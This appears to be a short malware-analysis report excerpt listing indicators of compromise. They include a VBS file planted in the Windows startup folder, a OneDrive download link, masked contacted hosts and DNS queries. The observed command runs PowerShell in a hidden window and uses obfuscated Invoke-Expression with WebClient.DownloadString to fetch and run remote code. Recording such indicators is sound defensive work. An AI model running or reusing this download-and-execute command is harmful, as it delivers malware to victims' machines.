Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\win.vbs
- https://onedrive.live.com/download?cid=8aa2b6573495aeb4&resid=8aa2b6573495aeb4%211676&authkey=apl10onhdggr9ma
- 'on####ve.live.com':443
- '80####.#b.files.1drv.com':443
- 'pe##.#yq-see.com':5355
- DNS ASK on####ve.live.com
- DNS ASK 80####.#b.files.1drv.com
- DNS ASK pe##.#yq-see.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=8AA2B6573495AEB4&resid=8AA2B6573495AEB4%211676&authkey=APl10oNhDGgR9MA'')'));...' (with hidden window)